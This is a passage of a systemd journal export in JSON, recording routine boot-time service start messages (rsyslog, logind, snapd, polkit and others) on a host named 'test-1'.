"job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started irqbalance daemon.", "UNIT" : "irqbalance.service", "INVOCATION_ID" : "1be2a31769ab44beb8244d37671930ea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818108770" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=312;b=e2b08827b5804427b422c10c84f1567e;m=2a62b8a;t=5bd16df69aaf1;x=fbcad028f3bb2848", "__REALTIME_TIMESTAMP" : "1615280818727665", "__MONOTONIC_TIMESTAMP" : "44444554", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting System Logging Service...", "UNIT" : "rsyslog.service", "INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818117517" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=313;b=e2b08827b5804427b422c10c84f1567e;m=2a63106;t=5bd16df69b06d;x=44466dd6d4bbe35a", "__REALTIME_TIMESTAMP" : "1615280818729069", "__MONOTONIC_TIMESTAMP" : "44445958", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : 
"unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Login Service...", "UNIT" : "systemd-logind.service", "INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818123449" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=314;b=e2b08827b5804427b422c10c84f1567e;m=2a63169;t=5bd16df69b0d1;x=2a228382b0220274", "__REALTIME_TIMESTAMP" : "1615280818729169", "__MONOTONIC_TIMESTAMP" : "44446057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Accounts Service...", "UNIT" : "accounts-daemon.service", "INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818132053" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=315;b=e2b08827b5804427b422c10c84f1567e;m=2a631b7;t=5bd16df69b11e;x=62f06e0e7556c3cb", "__REALTIME_TIMESTAMP" : "1615280818729246", "__MONOTONIC_TIMESTAMP" : "44446135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", 
"SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Pollinate to seed the pseudo random number generator...", "UNIT" : "pollinate.service", "INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818137998" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=316;b=e2b08827b5804427b422c10c84f1567e;m=2a63203;t=5bd16df69b16a;x=d489302caa2261be", "__REALTIME_TIMESTAMP" : "1615280818729322", "__MONOTONIC_TIMESTAMP" : "44446211", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LSB: Record successful boot for GRUB...", "UNIT" : "grub-common.service", "INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818151385" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=317;b=e2b08827b5804427b422c10c84f1567e;m=2a6324e;t=5bd16df69b1b6;x=406920915460381", "__REALTIME_TIMESTAMP" : "1615280818729398", "__MONOTONIC_TIMESTAMP" : "44446286", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started FUSE filesystem for LXC.", "UNIT" : "lxcfs.service", "INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818160126" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=318;b=e2b08827b5804427b422c10c84f1567e;m=2a63297;t=5bd16df69b1ff;x=a8ac43dca251c82f", "__REALTIME_TIMESTAMP" : "1615280818729471", "__MONOTONIC_TIMESTAMP" : "44446359", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started D-Bus System Message Bus.", "UNIT" : "dbus.service", "INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818169699" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=319;b=e2b08827b5804427b422c10c84f1567e;m=2a632fd;t=5bd16df69b264;x=797028d2a0721f41", "__REALTIME_TIMESTAMP" : "1615280818729572", "__MONOTONIC_TIMESTAMP" : "44446461", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/login/logind-button.c", "CODE_LINE" : "371", "CODE_FUNC" : "button_open", "SYSLOG_IDENTIFIER" : "systemd-logind", "MESSAGE" : "Watching system buttons on /dev/input/event0 (Power Button)", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270222" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31a;b=e2b08827b5804427b422c10c84f1567e;m=2a63468;t=5bd16df69b3cf;x=c81d19038f20e303", "__REALTIME_TIMESTAMP" : "1615280818729935", "__MONOTONIC_TIMESTAMP" : "44446824", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/login/logind-button.c", "CODE_LINE" : "371", "CODE_FUNC" : "button_open", "SYSLOG_IDENTIFIER" : "systemd-logind", 
"_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "MESSAGE" : "Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270478" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31b;b=e2b08827b5804427b422c10c84f1567e;m=2a634c0;t=5bd16df69b428;x=5665e3444908c6b1", "__REALTIME_TIMESTAMP" : "1615280818730024", "__MONOTONIC_TIMESTAMP" : "44446912", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "CODE_FILE" : "../src/login/logind-seat.c", "CODE_LINE" : "424", "CODE_FUNC" : "seat_start", "MESSAGE_ID" : "fcbefc5da23d428093f97c82a9290f7b", "SEAT_ID" : "seat0", "MESSAGE" : "New seat seat0.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270517" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31c;b=e2b08827b5804427b422c10c84f1567e;m=2a6352c;t=5bd16df69b493;x=566b08c1e3e04161", "__REALTIME_TIMESTAMP" : "1615280818730131", "__MONOTONIC_TIMESTAMP" : "44447020", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", 
"_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Snappy daemon...", "UNIT" : "snapd.service", "INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818338766" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31d;b=e2b08827b5804427b422c10c84f1567e;m=2a63582;t=5bd16df69b4ea;x=85a338f5b6a97b6d", "__REALTIME_TIMESTAMP" : "1615280818730218", "__MONOTONIC_TIMESTAMP" : "44447106", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Permit User Sessions...", "UNIT" : "systemd-user-sessions.service", "INVOCATION_ID" : "a8e88e06d97b45368fb077320099c4fb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818344557" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31e;b=e2b08827b5804427b422c10c84f1567e;m=2a635d3;t=5bd16df69b53a;x=80321e018d4924f9", "__REALTIME_TIMESTAMP" : "1615280818730298", "__MONOTONIC_TIMESTAMP" : 
"44447187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "rsyslog.service", "INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "Started System Logging Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818352740" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31f;b=e2b08827b5804427b422c10c84f1567e;m=2a6361b;t=5bd16df69b583;x=37287d3f7131b98f", "__REALTIME_TIMESTAMP" : "1615280818730371", "__MONOTONIC_TIMESTAMP" : "44447259", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-user-sessions.service", "INVOCATION_ID" : "a8e88e06d97b45368fb077320099c4fb", "MESSAGE" : "Started Permit User Sessions.", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280818367486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=320;b=e2b08827b5804427b422c10c84f1567e;m=2a639f5;t=5bd16df69b95d;x=f8b3d302d5b0ac25", "__REALTIME_TIMESTAMP" : "1615280818731357", "__MONOTONIC_TIMESTAMP" : "44448245", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-logind.service", "INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "MESSAGE" : "Started Login Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818386163" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=321;b=e2b08827b5804427b422c10c84f1567e;m=2a63a5a;t=5bd16df69b9c1;x=a44c1ff0b2d9943a", "__REALTIME_TIMESTAMP" : "1615280818731457", "__MONOTONIC_TIMESTAMP" : "44448346", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", 
"_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Authorization Manager...", "UNIT" : "polkit.service", "INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818393304" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=322;b=e2b08827b5804427b422c10c84f1567e;m=2a63aa7;t=5bd16df69ba0e;x=93403d3ec28c7d8e", "__REALTIME_TIMESTAMP" : "1615280818731534", "__MONOTONIC_TIMESTAMP" : "44448423", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Unattended Upgrades Shutdown.", "UNIT" : "unattended-upgrades.service", "INVOCATION_ID" : "64957dc245ff4da68583f884d2b6aa74", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818400923" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=323;b=e2b08827b5804427b422c10c84f1567e;m=2a63b03;t=5bd16df69ba6b;x=9707bf8b74d46972", "__REALTIME_TIMESTAMP" : "1615280818731627", "__MONOTONIC_TIMESTAMP" : "44448515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : 
"unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Hostname Service...", "UNIT" : "systemd-hostnamed.service", "INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818410195" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=324;b=e2b08827b5804427b422c10c84f1567e;m=2a63b70;t=5bd16df69bad8;x=85db8a79d2d07ec9", "__REALTIME_TIMESTAMP" : "1615280818731736", "__MONOTONIC_TIMESTAMP" : "44448624", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Terminate Plymouth Boot Screen...", "UNIT" : "plymouth-quit.service", "INVOCATION_ID" : "c345885054b24af6bf1126493e521c75", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818417474" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=325;b=e2b08827b5804427b422c10c84f1567e;m=2a63bd1;t=5bd16df69bb38;x=81711fd38359bea3", "__REALTIME_TIMESTAMP" : "1615280818731832", "__MONOTONIC_TIMESTAMP" : "44448721", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", 
"SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Hold until boot process finishes up...", "UNIT" : "plymouth-quit-wait.service", "INVOCATION_ID" : "616c38d09ecf41b98f0a3c178beaa4b6", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818422758" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=326;b=e2b08827b5804427b422c10c84f1567e;m=2a63c48;t=5bd16df69bbb0;x=9d8e718c053be8b2", "__REALTIME_TIMESTAMP" : "1615280818731952", "__MONOTONIC_TIMESTAMP" : "44448840", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "plymouth-quit-wait.service", "INVOCATION_ID" : 